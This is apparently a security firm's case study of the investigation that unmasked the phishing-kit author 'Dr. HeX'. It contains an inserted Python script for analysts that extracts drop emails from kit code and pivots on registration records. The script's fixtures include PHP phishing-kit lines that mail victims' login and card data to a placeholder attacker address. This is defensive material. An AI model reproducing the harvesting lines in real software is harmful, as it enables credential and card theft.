Background
Group-IB’s investigations and support to INTERPOL proved to be the breaking point in halting the disruptive actions of yet another prolific cybercriminal, following a two-year investigation. The investigation, named Lyrebird, involved experts from Group-IB and law enforcement agencies in identifying and apprehending a threat actor responsible for multiple attacks. These attacks targeted French telecommunications companies, major banks, and multinational corporations.
The operation was especially critical due to the scale of the target and the vectors employed to scam thousands of unsuspecting victims. According to Group-IB’s Threat Intelligence team, the suspect, dubbed Dr. HeX by Group-IB (based on one of the nicknames he used), has been active since at least 2009.
Upon examination, our team uncovered the actor’s malicious infrastructure used in various campaigns, which included phishing, defacing, malware development, fraud, and carding.
Behind the scenes
The threat actor known as Dr. HeX has been active for over a decade, experimenting with various tactics, with phishing kits being one of the most prominent. These kits served as the starting point for Group-IB’s research and investigation. They also played a key role in obtaining the perpetrator’s email address, triggering a chain of events that led to the discovery of the alleged attacker’s YouTube channel, registered under the pseudonym “Dr. HeX.”
In one of the video descriptions, the attacker included a link to an Arabic crowdfunding platform. This link allowed Group-IB researchers to uncover yet another alias associated with the cybercriminal. Dr. HeX’s digital footprint revealed the breadth of his malicious activities. In addition to carding and developing phishing and malware schemes, he was also involved in website defacement.
Group-IB determined that the suspect was responsible for attacks on 134 websites between 2009 and 2018, often leaving their signature name on compromised web pages.
Impact
The alleged perpetrator, revealed to be a Moroccan citizen, was apprehended in 2021 by the Moroccan police, with the help of strong data on his cybercrimes provided by Group-IB. The operation demonstrates how collaboration between international law enforcement agencies, regional police, and private companies played a crucial role in apprehending the cybercriminal, despite the challenges posed by the multi-jurisdictional nature of the attacks.
Storyline
With French telecommunications companies, major banks, and multinational corporations facing cyber threats from an anonymous threat actor, identifying and deanonymizing the cybercriminal was crucial.
Stepping up to assist INTERPOL, Group-IB obtained critical information about the threat actor’s operations when Group-IB’s Threat Intelligence system extracted a phishing kit (a tool used to create phishing web pages) that exploited the brand of a large French bank.
The set-up of the detected phishing kit followed a common technique – the creation of a spoofed website of a targeted company, the mass distribution of emails impersonating it, and asking users to enter login information on the spoofed site. The credentials left by unsuspecting victims on the fake page were then forwarded to the perpetrator’s email. Almost every script contained in the phishing kit carried its creator’s nickname, Dr HeX, and contact email address.
Therefore, the entire scheme was designed to exploit the targets’ trust and obtain sensitive information from them, which could then be used to initiate secondary attacks.
Figure 1: The phishing kit’s script transforms the collected victim’s data using “bincodes[.]com” service API
What stood out was the consistent use of the creator’s nickname, Dr. HeX, and contact email address in almost every script within the phishing kit. This breadcrumb led Group-IB’s threat intelligence analysts to discover the alleged attacker’s YouTube channel, registered under the same name – Dr. HeX. In the description of one of the videos, the attacker left a link directing viewers to an Arabic crowdfunding platform. This discovery enabled Group-IB researchers to uncover yet another name associated with the cybercriminal.
Through DNS data analysis, Group-IB uncovered that this name was used to register at least two domains, both created using the email found in the phishing kit.
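The two analyst steps described above, pulling the drop-email and contact indicators out of a phishing kit's scripts and then pivoting on that email across domain registration data, can be scripted. The following is an added example, not Group-IB's tooling nor code from the kit; the PHP sources, email addresses and WHOIS records are constructed placeholders.

```python
import re
from collections import defaultdict

# Constructed phishing-kit sources (placeholders, not the real kit).
KIT_FILES = {
    "login.php": (
        "<?php\n// coded by Dr HeX - contact: drhex[at]example.invalid\n"
        "$to = 'drhex@example.invalid';\n"
        "$msg = 'user: '.$_POST['user'].' pass: '.$_POST['pass'];\n"
        "mail($to, 'Result', $msg);\n"
        "header('Location: https://bank.example.invalid/');\n"
    ),
    "bin.php": (
        "<?php\n$bin = substr($_POST['card'], 0, 6);\n"
        "$info = file_get_contents('https://bincodes.example.invalid/api/'.$bin);\n"
        "mail('drhex@example.invalid', 'Card', $info);\n"
    ),
}

# Constructed registration records for the domain pivot step.
WHOIS_RECORDS = [
    {"domain": "kit-host-one.invalid", "registrant_email": "drhex@example.invalid"},
    {"domain": "kit-host-two.invalid", "registrant_email": "DrHex@Example.invalid"},
    {"domain": "unrelated.invalid", "registrant_email": "someone@else.invalid"},
]

# Plain and lightly obfuscated ("[at]", "[.]") addresses, as seen in kit comments.
EMAIL_RE = re.compile(r"[\w.+-]+(?:@|\[at\])[\w-]+(?:\.|\[\.\])[\w.-]+", re.I)
# Simple PHP string assignments, so mail($to, ...) can be resolved to a literal.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*['\"]([^'\"]+)['\"]")
# First argument of mail(): either a quoted literal or a $variable.
MAIL_CALL_RE = re.compile(r"mail\s*\(\s*(\$\w+|['\"][^'\"]+['\"])", re.I)

def normalize(addr):
    return addr.replace("[at]", "@").replace("[.]", ".").lower()

def extract_emails(kit_files):
    """Map each email found anywhere in the kit to the files it appears in."""
    found = defaultdict(set)
    for name, src in kit_files.items():
        for m in EMAIL_RE.findall(src):
            found[normalize(m)].add(name)
    return dict(found)

def exfil_recipients(kit_files):
    """Addresses actually used as mail() recipients: the credential drop points."""
    hits = set()
    for src in kit_files.values():
        consts = dict(ASSIGN_RE.findall(src))
        for arg in MAIL_CALL_RE.findall(src):
            val = consts.get(arg[1:]) if arg.startswith("$") else arg.strip("'\"")
            if val:
                hits.add(normalize(val))
    return hits

def pivot_domains(records, emails):
    """Domains whose registrant email matches one of the kit's addresses."""
    wanted = {normalize(e) for e in emails}
    return sorted(r["domain"] for r in records if normalize(r["registrant_email"]) in wanted)
```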
Decoding Dr. HeX’s malicious infrastructure
Group-IB’s experts leveraged Threat Intelligence’s patented graph network analysis technology to paint the most precise and descriptive picture possible of the cybercriminal’s extensive operations. It all began with a single email address extracted from the phishing kit, a digital breadcrumb that led Group-IB through a web of interconnected elements, revealing not only the extent of the threat actor’s malicious infrastructure but also their digital footprint. Five associated email addresses and six elusive nicknames emerged, along with active accounts on platforms ranging from Skype to YouTube.
It also came to light that the threat actor had defaced over 130 web pages over the course of a decade. Group-IB’s investigators dug deeper and found Dr. HeX’s posts on underground platforms suggesting participation in malware development, alongside his engagements in phishing, defacement, fraud, and carding – highlighting his multifaceted cyber operations.
Figure 2: Group-IB Graph findings on Dr. Hex accounts and malicious infrastructure
In addition, Group-IB discovered evidence suggesting Dr. HeX’s involvement in attacks on several large French corporations with the aim of stealing customers’ bank card data.
And justice for all
The information regarding Dr. HeX’s identity and the full extent of his criminal activity was then passed on to INTERPOL, which led the subsequent law enforcement operation. Our joint efforts uncovered evidence linking Dr. HeX to cyberattacks targeting prominent French corporations. This discovery facilitated cooperation between INTERPOL’s Cybercrime Directorate and the Moroccan Police via INTERPOL’s National Central Bureau in Rabat, leading to the eventual location and apprehension of the individual.
Conclusion
Group-IB’s firm commitment to supporting INTERPOL, coupled with our expansive yet authoritative presence across the globe through our Digital Crime Resistance Centers (DCRCs), helps us proactively assist in cross-border cybercrime investigations. Operation Lyrebird serves as a prime example of how public-private partnerships combat global threats by leveraging unique knowledge and technology capabilities, transcending jurisdictional boundaries.
In our collaborative efforts to safeguard our clients, businesses, and citizens from cyber threats, we maintain ongoing cooperation with INTERPOL, providing crucial intelligence on threat actor identities and the extent of their attacks, and facilitating successful operations despite the complexity of the cases. This partnership has consistently proven effective in holding cybercriminals accountable, irrespective of their operational sophistication or geographic location.